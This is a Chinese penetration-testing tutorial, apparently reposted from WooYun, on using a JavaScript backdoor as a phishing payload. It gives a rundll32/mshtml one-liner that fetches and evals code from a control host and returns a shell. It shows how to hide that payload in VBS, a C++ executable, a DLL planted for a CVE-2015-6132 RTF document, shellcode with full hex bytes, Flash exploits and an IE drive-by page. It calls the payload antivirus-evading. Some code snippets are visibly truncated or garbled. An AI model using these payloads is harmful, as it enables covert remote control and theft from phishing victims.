JavaScript Phishing
來自: http://drops.wooyun.org/tips/12386
0x00 前言
前段時間分享了JavaScript Backdoor技術,著重對其功能的開發、Bug的優化做了介紹,這次研究一下JavaScript Backdoor在實際滲透測試中的利用方法。
0x01 簡介
特點:
通過cmd執行代碼即可彈回shell
優勢:
- 免殺
- 簡便
- 較隱蔽
利用思路:
綜合其優勢特點,JavaScript作為Phishing Payload有著意想不到的效果,下面就結合相關漏洞做簡要介紹
0x02 隱藏在vbs中
最簡便的方法,將JavaScript的上線代碼寫到vbs中
原始的JavaScript 上線代碼:
#!bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.136/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
對應vbs中的代碼(注意轉義字符):
#!vb
set shell=createobject("wscript.shell")
shell.run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://192.168.174.136/connect"",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe"",0,true);}",0
點擊vbs腳本,即可彈回HTTP shell
0x03 隱藏在exe中
開發工具: VC6.0
需要注意以下細節:
1、使用ShellExecute, WinExec沒有區別
通過兩種方式執行cmd命令都可以
2、cmd 參數細節
eg:
#!bash cmd /c dir 是執行完dir命令后關閉命令窗口 cmd /k dir 是執行完dir命令后不關閉命令窗口 cmd /c start dir 會打開一個新窗口后執行dir指令,原窗口會關閉 cmd /k start dir 會打開一個新窗口后執行dir指令,原窗口不會關閉
所以在用c++執行cmd命令時,為了退出殘留的cmd進程,需要用 cmd /c start 再加上需要的cmd命令
3、轉義字符
c++中存在轉義字符,我們的命令中需要的轉義字符如下:
- " 需要用 \" 表示
- \ 需要用 \\ 表示
綜上,c++的代碼為
#!cppinclude "stdafx.h"
include <windows.h>
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { char *command="cmd.exe /c start rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write();h=new\%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\" /c taskkill /f /im rundll32.exe\",0,true);}"; WinExec(command,SW_HIDE); return 0; }</pre>
點擊exe,即可彈回HTTP shell
0x04 隱藏在dll中
開發工具: VC6.0
結合漏洞: CVE-2015-6132
細節可參考: http://zone.wooyun.org/content/24877
CVE-2015-6132 ,是一個類似于dll劫持的漏洞,如果在特定word文檔的同級目錄下放置一個dll,那么在打開word文檔并點擊圖標后會運行同級目錄下dll的代碼
如圖
planted-mqrt.doc里面包含圖標foo.txt,如果點擊圖標,那么會運行mqrt.dll中的代碼,即彈框
當然,把word 文檔改為rtf文檔即可實現在打開文檔后的自動觸發
如果把mqrt.dll的payload改為JavaScript Backdoor,那么會怎么樣呢?
下面我們就修改一下
方法也很簡單,但也需要注意cmd的參數和轉義字符的修改,關鍵代碼如下:
#!cpp BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { char *command="cmd.exe /c start rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new\%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.174.136/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new\%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}"; WinExec(command,SW_HIDE); } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }如圖
打開CVE-2015-6132.rtf,沒有任何異常反應
而這時我們的控制端已經彈回了shell,如圖
即使此時關閉CVE-2015-6132.rtf,shell仍然可以繼續操作
0x05 轉換成shellcode
開發工具: msf、vc6.0
結合漏洞: CVE-2015-5119&CVE-2015-5122
細節可參考: http://zone.wooyun.org/content/21586
使用 vc6.0 測試msf shellcode的技巧:
1、以messagebox舉例
msf:
#!bash use windows/messagebox set TEXT rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "; generate -t c如圖
不難看出msf也存在轉義字符
放在c++中測試msf shellcode,代碼如下
#!cppinclude "stdafx.h"
int main(int argc,char *argv[]) { unsigned char buf[] = "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b" "\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b" "\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24" "\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a" "\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c" "\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a" "\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2" "\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f" "\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52" "\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33" "\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89" "\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c" "\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67" "\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3" "\x68\x3b\x58\x20\x20\x68\x69\x6f\x6e\x20\x68\x69\x63\x61\x74" "\x68\x41\x70\x70\x6c\x68\x48\x54\x4d\x4c\x68\x2c\x52\x75\x6e" "\x68\x68\x74\x6d\x6c\x68\x2e\x2e\x6d\x73\x68\x69\x70\x74\x3a" "\x68\x61\x73\x63\x72\x68\x20\x6a\x61\x76\x68\x2e\x65\x78\x65" "\x68\x6c\x6c\x33\x32\x68\x72\x75\x6e\x64\x31\xc9\x88\x4c\x24" "\x35\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff" "\x55\x08"; __asm{ lea eax,buf call eax } return 0; }</pre>
如下圖可以看到彈框,shellcode執行成功
2、將JavaScript Backdoor轉換成shellcode
msf:
#!bash use windows/exec set CMD rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.174.136/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);} generate -t c如圖
放在c++中測試shellcode,代碼如下
#!cppinclude "stdafx.h"
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" "\x00\x53\xff\xd5\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78" "\x65\x20\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x22\x5c" "\x2e\x2e\x5c\x6d\x73\x68\x74\x6d\x6c\x2c\x52\x75\x6e\x48\x54" "\x4d\x4c\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x20\x22" "\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65" "\x28\x29\x3b\x68\x3d\x6e\x65\x77\x25\x32\x30\x41\x63\x74\x69" "\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x57\x69\x6e\x48" "\x74\x74\x70\x2e\x57\x69\x6e\x48\x74\x74\x70\x52\x65\x71\x75" "\x65\x73\x74\x2e\x35\x2e\x31\x22\x29\x3b\x68\x2e\x4f\x70\x65" "\x6e\x28\x22\x47\x45\x54\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f" "\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x37\x34\x2e\x31\x33" "\x36\x2f\x63\x6f\x6e\x6e\x65\x63\x74\x22\x2c\x66\x61\x6c\x73" "\x65\x29\x3b\x74\x72\x79\x7b\x68\x2e\x53\x65\x6e\x64\x28\x29" "\x3b\x42\x3d\x68\x2e\x52\x65\x73\x70\x6f\x6e\x73\x65\x54\x65" "\x78\x74\x3b\x65\x76\x61\x6c\x28\x42\x29\x3b\x7d\x63\x61\x74" "\x63\x68\x28\x65\x29\x7b\x6e\x65\x77\x25\x32\x30\x41\x63\x74" "\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x57\x53\x63" "\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c\x22\x29\x2e\x52\x75" "\x6e\x28\x22\x63\x6d\x64\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b" "\x69\x6c\x6c\x20\x2f\x66\x20\x2f\x69\x6d\x20\x72\x75\x6e\x64" "\x6c\x6c\x33\x32\x2e\x65\x78\x65\x22\x2c\x30\x2c\x74\x72\x75" "\x65\x29\x3b\x7d\x00";
__asm{ lea eax,buf call eax } return 0; }</pre>
運行后可以彈回shell,證明shellcode生成成功
3、結合CVE-2015-5119&CVE-2015-5122
測試環境
#!bash Windows 7 SP1 (64-bit) ie8.0.7600.16385 Adobe Flash Player 18,0,0,194步驟:
1、msf
#!bash use windows/exec set CMD rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.174.136/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);} generate -t dword如圖
2、修改原工程文件 ,使用Adobe Flash CS6 編譯生成新的swf
如圖新編譯的swf使用瀏覽器打開,彈回shell
同樣,將swf嵌入word、ppt、xls,均可彈回shell
此處細節略
0x06 結合Outlook漏洞
細節可參考: http://zone.wooyun.org/content/24657
測試環境
#!bash win7 x86 outlook2007打開偽造的Outlook文檔:
如圖,內容中包含一個docx的圖標
現在雙擊打開,如圖
點擊確定后,接著彈框,如圖,隨后彈回shell
0x07 結合ie漏洞
結合漏洞: CVE-2014-6332
步驟:
1、將JavaScript同CVE-2014-6332結合,實現掛馬
修改后的關鍵代碼為:
#!vb <SCRIPT LANGUAGE="VBScript">function runmumaa() On Error Resume Next set shell=createobject("wscript.shell") shell.run "rundll32.exe javascript:""..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"","" /c taskkill /f /im rundll32.exe"",0,true);}",0 end function </script></pre>
之后將html文件放于kali上
2、kali上開啟SimpleHTTPServer
#!bash python -m SimpleHTTPServer 80如圖
3、訪問 http://192.168.174.133/JavaScript.html
xp系統訪問直接彈回shell
如圖
win7 x64訪問會彈框
如圖
0x08 小結
通過以上內容,結合最近流行的IE、Office等經典的釣魚漏洞對JavaScript的用法做簡要介紹,希望能讓大家有所啟發,JavaScript Backdoor在滲透中會發揮越來越大的作用。
當然,上述漏洞的防御方法已經普及,對于普通用戶來說,建議及時更新補丁安裝最新殺毒軟件和防火墻。
本文由三好學生原創并首發于烏云drops,轉載請注明
</div>